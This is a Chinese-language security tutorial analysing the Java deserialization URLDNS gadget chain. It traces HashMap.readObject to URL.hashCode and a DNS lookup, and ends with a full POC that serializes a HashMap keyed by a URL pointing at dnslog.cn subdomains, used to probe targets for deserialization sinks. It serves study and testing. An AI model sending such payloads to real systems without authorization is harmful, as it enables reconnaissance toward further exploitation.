Java反序列化漏洞-URLDNS链分析
目录[*]一、前置知识
[*]反射
[*]二、分析
[*]1. URL
[*]2. HashMap
[*]3. 解决一些问题
[*]反射修改字段值
[*]三、POC
[*]四、利用链
一、前置知识
菜鸟教程 Java 序列化
Java安全-反射
URLDNS链的作用就是在目标主机中可能存在反序列化输入的数据的地方,传入序列化后的URLDNS利用链,如果目标主机解析了这个URL地址,那么证明该处存在反序列化数据的行为。然后就可以进一步尝试其他反序列化漏洞了。
反射
下面是两个本文中要用到的反射方法:
反射获取类对象:
Student s = new Student();
//方法1
Class clazz = s.getClass();
//方法2
Class clazz2 = Student.class;反射修改私有成员变量:
Field name = clazz.getDeclaredField("name");
name.setAccessible(true);
name.set(s,"zzy");二、分析
1. URL
URL.class关键代码
public final class URL implements java.io.Serializable {
private int hashCode = -1;
public synchronized int hashCode() {
if (hashCode != -1)
return hashCode;
hashCode = handler.hashCode(this);
return hashCode;
}
}首先看,URL类中有个hashCode方法,他会调用URLStreamHandler类的hashCode方法,URLStreamHandler的hashCode方法里面有个getHostAddress方法,它又会调用InetAddress下面这行代码,发起DNS请求。
addresses = nameService.lookupAllHostAddr(host);总而言之,记住调用URL类的hashCode方法就会发起DNS请求就可以了,域名是通过构造方法传入的。
写一下代码来看看能不能实现DNS请求
package com.learn;
import java.net.MalformedURLException;
import java.net.URL;
public class Blog {
public static void main(String[] args) throws MalformedURLException {
URL url = new URL("https://test.wc5uoi.dnslog.cn");
url.hashCode();
}
}https://img2023.cnblogs.com/blog/2855436/202312/2855436-20231230000846254-1647658446.png
可以看到成功发起了DNS请求
https://img2023.cnblogs.com/blog/2855436/202312/2855436-20231230000850603-6550192.png
我们最终要的效果是在反序列化的过程中发起DNS请求,那么需要在readObject中有hashCode方法,或者在readObject中有的方法调用了URL类的hashCode方法
URL类中的readObject方法
https://img2023.cnblogs.com/blog/2855436/202312/2855436-20231230000856326-559871949.png
URL类自身的readObject方法有点没有头绪,我们还是来找找其他类的readObject方法吧
2. HashMap
可以看到HashMap有一个hash方法调用了hashCode方法
static final int hash(Object key) {
int h;
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}右键hash方法,选择查找用法,可以看到HashMap的readObject方法使用了hash方法,readObject不正好是反序列化的入口点吗,那可太好了
https://img2023.cnblogs.com/blog/2855436/202312/2855436-20231230000903308-467165784.png
在readObject中key是从输入流中读取的。具体来说,在循环中,通过调用s.readObject()方法来读取一个对象,并将其强制转换为K类型,即键的类型。
所以key的值是从序列化的HashMap对象获得的,在这里我们可以把key的值设成URL对象,那么在hash方法中就会调用URL的hashCode方法,进而完成DNS解析。
试着写一下代码
package com.learn;
import java.io.*;
import java.net.URL;
import java.util.HashMap;
public class Blog {
public static void main(String[] args) throws IOException, ClassNotFoundException {
URL url = new URL("https://test.9oeary.dnslog.cn");
HashMap<URL, String> hashMap = new HashMap<URL, String>();
hashMap.put(url, "123");
serial(hashMap);
unserial();
}
public static void serial(Object obj) throws IOException {
//Serialize
ObjectOutputStream objectOut = new ObjectOutputStream(new FileOutputStream("ser.bin"));
objectOut.writeObject(obj);
objectOut.close();
}
public static void unserial() throws IOException, ClassNotFoundException {
//UnSerialize
ObjectInputStream objIn = new ObjectInputStream(new FileInputStream("ser.bin"));
Object result = objIn.readObject();
System.out.println(result.toString());
objIn.close();
}
}成功完成DNS请求
https://img2023.cnblogs.com/blog/2855436/202312/2855436-20231230000912162-1017243018.png
https://img2023.cnblogs.com/blog/2855436/202312/2855436-20231230000916041-218738158.png
虽然这里成功发起dns请求了,但是把序列化和反序列化代码注释掉,他还是发起了dns请求
https://img2023.cnblogs.com/blog/2855436/202312/2855436-20231230000920701-920468075.png
这是为什么呢?
3. 解决一些问题
通过调试看到,HashMap在put的时候就会调用hash方法
https://img2023.cnblogs.com/blog/2855436/202312/2855436-20231230000925271-1810554038.png
所以程序在序列化前就会发起dns请求,那么怎么才能在序列化前不触发dns请求呢?
继续跟进程序,这是URL的hashCode方法:
public synchronized int hashCode() {
if (hashCode != -1)
return hashCode;
hashCode = handler.hashCode(this);
return hashCode;
}可以看到如果hashCode变量不是-1的话,那么就会return,不会再执行handler.hashCode,这样就不会发起dns请求
继续跟进,发现hashCode在定义时的初始值就是-1
private int hashCode = -1;反射修改字段值
由于hashCode是私有变量,无法直接修改,所以这里用反射来修改成员变量的值
Field hashCodeField = URL.class.getDeclaredField("hashCode");
hashCodeField.setAccessible(true);
hashCodeField.set(url, 1);由于这里把hashCode改为1了,在put后还需要把它改回-1,让程序在反序列化还会发起dns请求
//将hashCode改为 1Field hashCodeField = URL.class.getDeclaredField("hashCode");
hashCodeField.setAccessible(true);
hashCodeField.set(url, 1);hashMap.put(url, "123");//将hashCode改回 -1hashCodeField.set(url, -1);三、POC
package com.learn;
import java.io.*;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;
public class Blog {
public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
URL url = new URL("https://test.0x044e.dnslog.cn");
HashMap<URL, String> hashMap = new HashMap<URL, String>();
//将hashCode改为 1
Field hashCodeField = URL.class.getDeclaredField("hashCode");
hashCodeField.setAccessible(true);
hashCodeField.set(url, 1);
hashMap.put(url, "随便输入点东西");
//将hashCode改回 -1
hashCodeField.set(url, -1);
serial(hashMap);
unserial();
}
public static void serial(Object obj) throws IOException {
//Serialize
ObjectOutputStream objectOut = new ObjectOutputStream(new FileOutputStream("ser.bin"));
objectOut.writeObject(obj);
objectOut.close();
}
public static void unserial() throws IOException, ClassNotFoundException {
//UnSerialize
ObjectInputStream objIn = new ObjectInputStream(new FileInputStream("ser.bin"));
Object result = objIn.readObject();
System.out.println(result.toString());
objIn.close();
}
}https://img2023.cnblogs.com/blog/2855436/202312/2855436-20231230000939576-1481453244.png
到此poc已构造完毕,把序列化的数据发送到可能存在反序列化时的功能点上,如果dns请求成功,那么就代表这个功能点存在反序列化,之后可以进一步利用其他的反序列化漏洞来进行测试
https://img2023.cnblogs.com/blog/2855436/202312/2855436-20231230000944043-397031771.png
四、利用链
HashMap.readObject()
HashMap.hash()
URL.hashCode()
URLStreamHandler.hashCode()
URLStreamHandler.getHostAddress()
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]